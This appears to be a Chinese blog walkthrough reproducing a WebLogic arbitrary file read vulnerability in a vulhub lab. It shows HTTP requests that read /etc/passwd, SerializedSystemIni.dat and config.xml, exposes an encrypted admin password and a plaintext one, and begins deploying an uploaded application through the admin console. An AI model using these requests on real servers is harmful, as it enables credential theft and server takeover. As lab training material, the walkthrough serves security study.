漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞

本文详细介绍了WebLogic服务器存在的文件读取漏洞,通过访问特定URL可以读取服务器上的敏感文件,如/etc/passwd。示例中展示了如何使用Burpsuite抓取并解析二进制文件,以及如何获取加密的管理员密码。利用这个漏洞,攻击者能够获取后台管理权限,进一步操作包括应用部署在内的各种功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

weblogic 文件读取漏洞
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
访问http://192.168.15.136:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件
在这里插入图片描述
在这里插入图片描述
GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1
在这里插入图片描述
是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
GET /hello/file.jsp?path=config/config.xml HTTP/1.1
找到其中的的值,即为加密后的管理员密码
在这里插入图片描述
在这里插入图片描述
{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=
在这里插入图片描述
不知道为啥解不出来 Oracle@123
取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表
在这里插入图片描述
在这里插入图片描述

点击安装,选择“上载文件”:

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

复现weblogic漏洞,可以使用vulhub靶场中的weblogic服务。vulhub中提供了一些weblogic版本,包括weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2和weblogic 12.2.1.3。你可以选择其中一个版本来启动weblogic服务。 你可以通过访问https://github.com/zhzyker/exphub/tree/master/weblogic获取更多关于weblogic漏洞的信息。 在vulhub的靶场上,你可以学习和复现一些weblogic漏洞。虽然还有很多其他漏洞没有被复现,但通过复现一些典型漏洞,你可以熟悉这些漏洞的原理。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhubWeblogic(CVE-2018-2894)漏洞复现](https://blog.youkuaiyun.com/qq_45300786/article/details/115579631)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Weblogic系列漏洞复现——vulhub](https://blog.youkuaiyun.com/qq_45612828/article/details/126235627)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值